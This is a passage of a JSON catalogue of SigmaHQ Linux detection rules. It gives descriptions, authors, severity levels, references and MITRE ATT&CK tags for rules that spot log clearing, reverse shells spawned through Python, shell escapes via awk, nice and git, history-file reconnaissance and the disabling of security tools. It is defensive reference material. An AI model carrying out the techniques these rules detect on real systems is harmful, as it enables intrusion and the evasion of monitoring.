"logsource.category": "No established category", "logsource.product": "linux", "refs": [ "self experience", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_logging_config_change.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.006" ] }, "related": [ { "dest-uuid": "74d2a63f-3c7b-4852-92da-02d8fbab16da", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c830f15d-6f6e-430f-8074-6f73d6807841", "value": "Logging Configuration Changes on Linux Host" }, { "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware.\nThis rule detects the use of dd and truncate to add junk data to a file.\n", "meta": { "author": "Igor Fits, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_binary_padding.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_binary_padding.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.001" ] }, "related": [ { "dest-uuid": "5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c52a914f-3d8b-4b2a-bb75-b3991e75f8ba", "value": "Binary Padding - Linux" }, { "description": "Detects command-line operations on shell history files", "meta": { "author": "Mikhail Larin, oscd.community", "creation_date": "2020-10-17", "falsepositive": [ "Legitimate administrative activity", "Legitimate software cleaning the history file" ], "filename": "lnx_auditd_susp_histfile_operations.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml" ], "tags": [ "attack.credential-access", "attack.t1552.003" ] }, "related": [ { "dest-uuid": "8187bd2a-866f-4457-9009-86b0ddedffa3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eae8ce9f-bde9-47a6-8e79-f20d18419910", "value": "Suspicious History File Operations - Linux" }, { "description": "Detects loading of kernel modules with the insmod command.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nAdversaries may use LKMs to obtain persistence within the system or elevate privileges.\n", "meta": { "author": "Pawel Mazur", "creation_date": "2021-11-02", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_load_module_insmod.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://linux.die.net/man/8/insmod", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md", "https://man7.org/linux/man-pages/man8/kmod.8.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1547.006" ] }, "related": [ { "dest-uuid": "a1b52199-c8c5-438a-9ded-656f1d0888c6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "106d7cbd-80ff-4985-b682-a7043e5acb72", "value": "Loading of Kernel Module via Insmod" }, { "description": "Detects use of the \"split\" command to split files into parts for possible transfer.", "meta": { "author": "Igor Fits, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ 
"Legitimate administrative activity" ], "filename": "lnx_auditd_split_file_into_pieces.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml" ], "tags": [ "attack.exfiltration", "attack.t1030" ] }, "related": [ { "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2dad0cba-c62a-4a4f-949f-5f6ecd619769", "value": "Split A File Into Pieces - Linux" }, { "description": "Detects calls to hidden files or files located in hidden directories in NIX systems.", "meta": { "author": "David Burkett, @signalblur", "creation_date": "2022-12-30", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_hidden_binary_execution.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_binary_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.001" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e1bef8d-0fff-46f6-8465-9aa54e128c1e", "value": "Use Of Hidden Paths Or Files" }, { "description": "Detects attempts to clear logs on the system. 
Adversaries may clear system logs to hide evidence of an intrusion", "meta": { "author": "Ömer Günal, oscd.community", "creation_date": "2020-10-07", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_clear_logs.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.002" ] }, "related": [ { "dest-uuid": "2bce5b30-7014-4a5d-ade7-12913fe6ac36", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "80915f59-9b56-4616-9de0-fd0dea6c12fe", "value": "Clear Linux Logs" }, { "description": "Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network.\nThis behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT\n", "meta": { "author": "David Burkett (@signalblur)", "creation_date": "2024-04-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_pnscan_binary_cli_pattern.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.virustotal.com/gui/file/beddf70a7bab805f0c0b69ac0989db6755949f9f68525c08cb874988353f78a9/content", "https://intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf", "https://www.cadosecurity.com/blog/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence", "https://regex101.com/r/RugQYK/1", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_pnscan_binary_cli_pattern.yml" ], 
"tags": [ "attack.discovery", "attack.t1046" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "97de11cd-4b67-4abf-9a8b-1020e670aa9e", "value": "Pnscan Binary Data Transmission Activity" }, { "description": "Detects usage of the 'chattr' utility to remove immutable file attribute.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-15", "falsepositive": [ "Administrator interacting with immutable files (e.g. for instance backups)." ], "filename": "proc_creation_lnx_chattr_immutable_removal.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml" ], "tags": [ "attack.defense-evasion", "attack.t1222.002" ] }, "related": [ { "dest-uuid": "09b130a2-a77e-4af0-a361-f46f9aad1345", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "34979410-e4b5-4e5d-8cfb-389fdff05c12", "value": "Remove Immutable File Attribute" }, { "description": "Detects the creation of a new named pipe using the \"mkfifo\" utility in a potentially suspicious location", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk", "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml" ], "tags": [ "attack.execution" ] }, "uuid": "999c3b12-0a8c-40b6-8e13-dd7d62b75c7a", "value": "Potentially Suspicious Named Pipe Created Via Mkfifo" }, { "description": "Detects the execution of \"awk\" or its sibling commands, to invoke a shell using the system() function.\nThis behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.\n", "meta": { "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)", "creation_date": "2024-09-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_awk_shell_spawn.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://gtfobins.github.io/gtfobins/mawk/#shell", "https://gtfobins.github.io/gtfobins/awk/#shell", "https://gtfobins.github.io/gtfobins/nawk/#shell", "https://gtfobins.github.io/gtfobins/gawk/#shell", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_awk_shell_spawn.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8c1a5675-cb85-452f-a298-b01b22a51856", "value": "Suspicious Invocation of Shell via AWK - Linux" }, { "description": "Detects the execution of python with calls to the socket and pty modules in order to connect and spawn a potential reverse shell.\n", "meta": { "author": "@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_python_reverse_shell.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": 
[ "https://www.revshells.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml" ], "tags": [ "attack.execution" ] }, "uuid": "32e62bc7-3de0-4bb1-90af-532978fe42c0", "value": "Python Reverse Shell Execution Via PTY And Socket Modules" }, { "description": "Detects the creation of a new named pipe using the \"mkfifo\" utility", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_mkfifo_named_pipe_creation.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk", "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation.yml" ], "tags": [ "attack.execution" ] }, "uuid": "9d779ce8-5256-4b13-8b6f-b91c602b43f4", "value": "Named Pipe Created Via Mkfifo" }, { "description": "Detects enumeration of local system accounts. 
This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-08", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_local_account.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_account.yml" ], "tags": [ "attack.discovery", "attack.t1087.001" ] }, "related": [ { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b45e3d6f-42c6-47d8-a478-df6bd6cf534c", "value": "Local System Accounts Discovery - Linux" }, { "description": "Detects the use of at/atd which are utilities that are used to schedule tasks.\nThey are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code\n", "meta": { "author": "Ömer Günal, oscd.community", "creation_date": "2020-10-06", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_at_command.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_at_command.yml" ], "tags": [ "attack.persistence", "attack.t1053.002" ] }, "related": [ { "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"d2d642d7-b393-43fe-bae4-e81ed5915c4b", "value": "Scheduled Task/Job At" }, { "description": "Detects execution of the \"esxcli\" command with the \"system\" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.", "meta": { "author": "Cedric Maurugeon", "creation_date": "2023-09-04", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_esxcli_system_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1033", "attack.t1007" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e80273e1-9faf-40bc-bd85-dbaff104c4e9", "value": "ESXi System Information Discovery Via ESXCLI" }, { "description": "Detects usage of system utilities to discover files and directories", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate activities" ], "filename": "proc_creation_lnx_file_and_directory_discovery.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72", "value": "File and Directory Discovery - Linux" }, { "description": "Detects usage of system utilities to discover system network connections", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate activities" ], "filename": "proc_creation_lnx_system_network_connections_discovery.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1049" ] }, "related": [ { "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79", "value": "System Network Connections Discovery - Linux" }, { "description": "Detects disabling security tools", "meta": { "author": "Ömer Günal, Alejandro Ortuno, oscd.community", "creation_date": "2020-06-17", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_security_tools_disabling.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e3a8a052-111f-4606-9aee-f28ebeb76776", "value": "Disabling Security Tools" }, { "description": "Detects the use of the \"nice\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n", "meta": { "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)", "creation_date": "2024-09-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_nice_shell_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html", "https://gtfobins.github.io/gtfobins/nice/#shell", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nice_shell_execution.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "093d68c7-762a-42f4-9f46-95e79142571a", "value": "Shell Execution via Nice - Linux" }, { "description": "Detects the command line executed when TeamViewer starts a session started by a remote host.\nOnce a connection has been started, an investigator can verify the connection details by viewing the \"incoming_connections.txt\" log file in the TeamViewer folder.\n", "meta": { "author": "Josh Nickels, Qi Nan", "creation_date": "2024-03-11", "falsepositive": [ "Legitimate usage of TeamViewer" ], 
"filename": "proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml" ], "tags": [ "attack.initial-access", "attack.t1133" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1f6b8cd4-3e60-47cc-b282-5aa1cbc9182d", "value": "Remote Access Tool - Team Viewer Session Started On Linux Host" }, { "description": "Detects suspicious interactive bash as a parent to rather uncommon child processes", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-14", "falsepositive": [ "Legitimate software that uses these patterns" ], "filename": "proc_creation_lnx_susp_interactive_bash.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1059.004", "attack.t1036" ] }, "related": [ { "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ea3ecad2-db86-4a89-ad0b-132a10d2db55", "value": "Interactive Bash Suspicious Children" }, { "description": "Detects suspicious change of file privileges with chown and chmod commands", "meta": { "author": "Ömer Günal", "creation_date": "2020-06-16", "falsepositive": [ "Legitimate administration 
activities" ], "filename": "proc_creation_lnx_setgid_setuid.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://attack.mitre.org/techniques/T1548/001/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml" ], "tags": [ "attack.persistence", "attack.t1548.001" ] }, "related": [ { "dest-uuid": "6831414d-bb70-42b7-8030-d4e06b2660c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c21c4eaa-ba2e-419a-92b2-8371703cbe21", "value": "Setuid and Setgid" }, { "description": "Detects usage of crontab to list the tasks of the user", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-06-02", "falsepositive": [ "Legitimate use of crontab" ], "filename": "proc_creation_lnx_crontab_enumeration.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml" ], "tags": [ "attack.discovery", "attack.t1007" ] }, "related": [ { "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "403ed92c-b7ec-4edd-9947-5b535ee12d46", "value": "Crontab Enumeration" }, { "description": "Detects system information discovery commands", "meta": { "author": "Ömer Günal, 
oscd.community", "creation_date": "2020-10-08", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_system_info_discovery.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "42df45e7-e6e9-43b5-8f26-bec5b39cc239", "value": "System Information Discovery" }, { "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "creation_date": "2021-10-15", "falsepositive": [ "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." 
], "filename": "proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/Azure/Azure-Sentinel/pull/3059", "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml" ], "tags": [ "attack.privilege-escalation", "attack.initial-access", "attack.execution", "attack.t1068", "attack.t1190", "attack.t1203" ] }, "related": [ { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "21541900-27a9-4454-9c4c-3f0a4240344a", "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand" }, { "description": "Detects execution of network scanning and reconnaissance tools. 
These tools can be used for the enumeration of local or remote network services for example.", "meta": { "author": "Alejandro Ortuno, oscd.community, Georg Lauenstein (sure[secure])", "creation_date": "2020-10-21", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_susp_network_utilities_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/projectdiscovery/naabu", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", "https://github.com/Tib3rius/AutoRecon", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_network_utilities_execution.yml" ], "tags": [ "attack.discovery", "attack.t1046" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3e102cd9-a70d-4a7a-9508-403963092f31", "value": "Linux Network Service Scanning Tools Execution" }, { "description": "Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-15", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_base64_shebang_cli.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS", "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml" ], "tags": [ "attack.defense-evasion", "attack.t1140" ] }, "related": [ { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fe2f9663-41cb-47e2-b954-8a228f3b9dff", "value": "Linux Base64 Encoded Shebang In CLI" }, { "description": "Detects the use of the \"git\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n", "meta": { "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)", "creation_date": "2024-09-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_git_shell_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://gtfobins.github.io/gtfobins/git/#shell", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_git_shell_execution.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "47b3bbd4-1bf7-48cc-84ab-995362aaa75a", "value": "Shell Execution via Git - Linux" }, { "description": "Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-20", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_susp_history_recon.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/sleventyeleven/linuxprivchecker/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml" ], "tags": [ 
"attack.reconnaissance", "attack.t1592.004" ] }, "related": [ { "dest-uuid": "774ad5bb-2366-4c13-a8a9-65e50b292e7c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d7821ff1-4527-4e33-9f84-d0d57fa2fb66", "value": "Print History File Contents" }, { "description": "Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system.", "meta": { "author": "@d4ns4n_ (Wuerth-Phoenix)", "creation_date": "2023-05-30", "falsepositive": [ "Some false positives are to be expected on user or administrator machines. Apply additional filters as needed." ], "filename": "proc_creation_lnx_susp_sensitive_file_access.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://learn.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview#which-files-should-i-monitor", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_sensitive_file_access.yml" ], "tags": [ "attack.impact", "attack.t1565.001" ] }, "related": [ { "dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292", "tags": [ 